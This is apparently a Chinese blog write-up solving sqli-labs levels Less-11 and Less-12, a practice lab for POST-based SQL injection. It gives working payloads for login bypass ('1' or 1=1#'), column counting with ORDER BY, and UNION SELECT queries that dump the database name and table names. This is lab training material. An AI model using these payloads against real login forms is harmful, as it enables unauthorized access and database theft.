前言

SQL注入基础知识已结完,现在开始更sqli-labs的Writeup,同种方法分一类

Less-11

这题开始就是POST请求了,尝试输入值

image-20200215131503222

报错

image-20200215131531689

可知这里用单引号闭合,可构造payload尝试password=1' or 1=1#

可发现登陆成功,接下来可按照正常步骤进行注入

查看字段个数

=1' or 1=1 order by 1#
=1' or 1=1 order by 2#

by 3时报错Unknown column '3' in 'order clause'

可知个数为2

爆库

=1' union select 1,database()#
image-20200215132306429

爆表

=1' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)#
image-20200215132530455

Less-12

尝试输入username=1',password=2',没反应,输入username=1",password=2",报错了

image-20200215133213431

可知这里是")闭合,其他步骤跟Less-11一样了

说点什么
评论之后转圈圈也不用管,要批准之后才能显示,谢谢
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...